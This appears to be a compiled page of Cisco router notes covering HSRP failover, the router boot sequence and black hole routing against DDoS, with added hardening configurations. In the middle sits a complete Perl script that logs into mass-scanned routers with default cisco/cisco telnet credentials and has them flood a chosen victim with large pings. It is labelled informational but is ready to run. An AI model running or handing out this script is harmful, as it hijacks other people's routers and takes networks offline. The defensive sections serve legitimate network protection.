HSRP simple example

Let’s talk about two routers, A and B, that use the HSRP protocol for fault tolerance and for protection against attack.

Router A uses the IP address 192.168.0.2 with the mask 255.255.255.0.
Router B uses the IP address 192.168.0.3 with the mask 255.255.255.0.

The virtual IP address is 192.168.0.1; it is the default gateway of the hosts on the segment and is configured as follows:

Router A
interface Ethernet 0/0
ip address 192.168.0.2 255.255.255.0
standby 10 priority 100 preempt
standby 10 ip 192.168.0.1

Router B
interface Ethernet 0/0
ip address 192.168.0.3 255.255.255.0
standby 10 priority 80
standby 10 ip 192.168.0.1
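The configuration above relies on HSRP's default cleartext authentication string ("cisco"), so any device on the 192.168.0.0/24 segment can take part in the election for group 10. As an added example, which is not part of the original page, here is the same two-router setup with the hardening a practitioner would want on top of it: MD5 authentication on the group, explicit hello and hold timers, and a preempt delay so that router A does not take the virtual IP back before it has finished converging. The key string HSRP-KEY-EXAMPLE is a placeholder; the rest of the values are the page's own.

```cisco
! Router A (preferred active router, priority 100)
interface Ethernet0/0
 ip address 192.168.0.2 255.255.255.0
 standby 10 ip 192.168.0.1
 standby 10 priority 100
 ! wait 30 s after coming up before claiming the active role back
 standby 10 preempt delay minimum 30
 ! hello every 1 s, declare the peer dead after 3 s
 standby 10 timers 1 3
 ! key string is a placeholder; must be identical on both routers
 standby 10 authentication md5 key-string HSRP-KEY-EXAMPLE
!
! Router B (standby router, priority 80, no preempt as on the page)
interface Ethernet0/0
 ip address 192.168.0.3 255.255.255.0
 standby 10 ip 192.168.0.1
 standby 10 priority 80
 standby 10 timers 1 3
 standby 10 authentication md5 key-string HSRP-KEY-EXAMPLE
```

Check the result with "show standby brief" on both routers: A should show Active and B Standby. Hellos whose MD5 digest does not match the configured key are ignored, so a mismatched key on one side shows up as both routers believing they are Active, which is the first thing to look for when the group does not form.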


DDoS based on ICMP echo request

Proof of concept of a simple DDoS program based on ICMP echo requests sent from Cisco routers.
With a mass scanner you can get a large list of Cisco default installs,
and by looking at their MTU and throughput you may tune the ICMP size to DoS a big network in a few seconds.
The program is informational only; please keep it that way.

#!/usr/bin/perl
use Parallel::ForkManager;
use Net::Telnet ();
use Net::Telnet::Cisco;
use strict;

sub usage {
print "\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n";
exit;
}

my $victim = $ARGV[0];
my $file = $ARGV[1];

if ((!$victim) or (!$file)) {
usage;
}

# the script depends on routers still using the default telnet credentials
my $login = "cisco";
my $passwd = "cisco";
my $enable = "cisco";
my $mtu = 1500;
my $cmd = "ping ".$victim." size 1500 df-bit repeat 1000";

open FILE, "<$file" or die $!;
my $pm = new Parallel::ForkManager(100);
for (1..1000) {
while (<FILE>) {
$pm->start and next;
my $host = $_;
my $session = Net::Telnet::Cisco->new(Host => $host);
$session->login($login, $passwd);
$session->enable($enable);
$session->cmd($cmd);
$pm->finish; ## end point of the parallel process
}
}
$pm->wait_all_children; ## wait for the child processes
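The script above only works against routers that leave two things open: telnet management reachable from anywhere with the default cisco/cisco credentials, and an upstream interface that accepts any volume of ICMP. As an added example, not from the original page, here is the IOS configuration a defender would apply to close both. The hostname, the domain name, the management subnet 10.10.10.0/24, the username, the interface name and the policing rates are assumptions to adapt; the credential values are placeholders.

```cisco
! --- Management plane: SSH only, from the management subnet, with real credentials ---
hostname edge1
ip domain-name example.net          ! required before the RSA key can be generated
crypto key generate rsa modulus 2048
ip ssh version 2
service password-encryption
enable secret <strong-enable-secret-placeholder>
username netadmin privilege 15 secret <strong-password-placeholder>
! slow down credential guessing: 3 failures within 60 s blocks logins for 120 s
login block-for 120 attempts 3 within 60
!
access-list 10 permit 10.10.10.0 0.0.0.255
line vty 0 4
 access-class 10 in                 ! only the management subnet may connect
 transport input ssh                ! telnet is no longer accepted
 login local
 exec-timeout 5 0
!
no ip http server
no ip http secure-server
!
! --- Data plane: police inbound ICMP echo on the upstream-facing interface ---
access-list 101 permit icmp any any echo
access-list 101 permit icmp any any echo-reply
class-map match-all ICMP-ECHO
 match access-group 101
policy-map LIMIT-ICMP
 class ICMP-ECHO
  ! 256 kbit/s of ICMP echo is allowed through, the excess is dropped
  police 256000 8000 8000 conform-action transmit exceed-action drop
!
interface GigabitEthernet0/0
 description upstream
 service-policy input LIMIT-ICMP
```

The first half removes what the script needs on the routers it would log into; the second half protects the router behind the link. Policing at the victim's own edge cannot unclog an upstream link that is already saturated with 1500-byte echo requests, which is why the next section moves the drop into the provider's network.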

What Happens As Your Router Boots Up

1. The “Power-On Self-Test” (POST) checks the router hardware. This includes the CPU (Central Processing Unit), memory, and interfaces.
2. The “Bootstrap Program”, which is stored in ROM, runs.
3. The “Boot Field” of the configuration register is read to find out the proper operating system source.
4. The “Operating System Image” is loaded into RAM (Random Access Memory).
5. The “Configuration File” saved in NVRAM is loaded into RAM. The configuration file is then executed one line at a time.
6. If no “Configuration File” is found in NVRAM, the Cisco IOS will offer you the chance to use the “Initial Configuration Dialog”. This is a set of questions for you to answer to do a basic configuration. Since in our theoretical new router there is no NVRAM configuration, this “Setup Dialog” will be one of the first things we see.

Stop DDoS attacks on a Cisco router

ISPs have other options available that depend on routing changes, such as black hole filtering. Black hole filtering works by forwarding malicious traffic to an imaginary interface known as Null0 – similar to /dev/null on Unix machines. Since it’s not a valid interface, traffic routed to Null0 is essentially dropped. Moreover, this technique minimizes performance impact – a useful feature during the DDoS investigation so the rest of the network remains stable under the heavy load.

Here’s the simplest form of a black hole route:

Router(config)# interface Null0
Router(config-if)# no ip unreachables
Router(config-if)# exit
Router(config)# ip route 1.1.1.1 255.255.255.255 Null0

This static route sends all traffic arriving on this router for that destination to the Null0 interface, in effect discarding it: the traffic goes into the black hole. Turning off ICMP unreachables on Null0 matters because otherwise the router would answer every dropped packet with an error message and do part of the attacker's work itself.

You could also redistribute this route into your dynamic routing protocol so that it is sent to all other routers on your network. Then all routers would forward traffic for that destination towards your router, and your router would drop it.

Using the ISP's black hole you can drop the bad traffic before it reaches you at all. Imagine that the target IP of the DDoS is 1.2.3.4 and my AS is 1234. The transit provider is AS 1000 and its blackhole community is tagged with 666.

On a Cisco router I may use the following to blackhole the traffic before it enters my network.

router bgp 1234
bgp router-id 1.2.3.4
redistribute static route-map static-to-bgp
..
..
!
route-map static-to-bgp permit 5
match tag 666
set community 1000:666 additive
!
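The fragment above shows only the BGP side; the static route that carries the tag and the neighbor statement that actually exports the community are elided. As an added example, which is not the page's own configuration, here is a complete version of both black hole forms discussed in this section, using the page's values: victim 1.2.3.4, my AS 1234, transit AS 1000, blackhole community 1000:666, route tag 666. The neighbor address 203.0.113.1 is an assumption.

```cisco
! Local drop: traffic for the victim goes to Null0, no ICMP errors are generated
interface Null0
 no ip unreachables
! the tag is what the route-map below keys on; nothing else is redistributed
ip route 1.2.3.4 255.255.255.255 Null0 tag 666
!
! show communities as AS:value rather than a single 32-bit number
ip bgp-community new-format
!
router bgp 1234
 neighbor 203.0.113.1 remote-as 1000
 ! without send-community the 1000:666 marking never leaves the router
 neighbor 203.0.113.1 send-community
 redistribute static route-map static-to-bgp
!
route-map static-to-bgp permit 5
 match tag 666
 set community 1000:666 additive
! any static route without the tag stays local (explicit form of the implicit deny)
route-map static-to-bgp deny 10
```

Verify with "show ip route 1.2.3.4" (next hop Null0) and "show ip bgp 1.2.3.4" (community 1000:666 attached). The provider only accepts a /32 because it carries the agreed community; its own policy rewrites the next hop to a discard address, so the flood is dropped at AS 1000's edge rather than on the link into AS 1234. Note that this sacrifices the victim host entirely for the duration: the attack has succeeded against 1.2.3.4, but the rest of the network stays up. To restore service, remove the static route ("no ip route 1.2.3.4 255.255.255.255 Null0 tag 666") and the withdrawal propagates automatically.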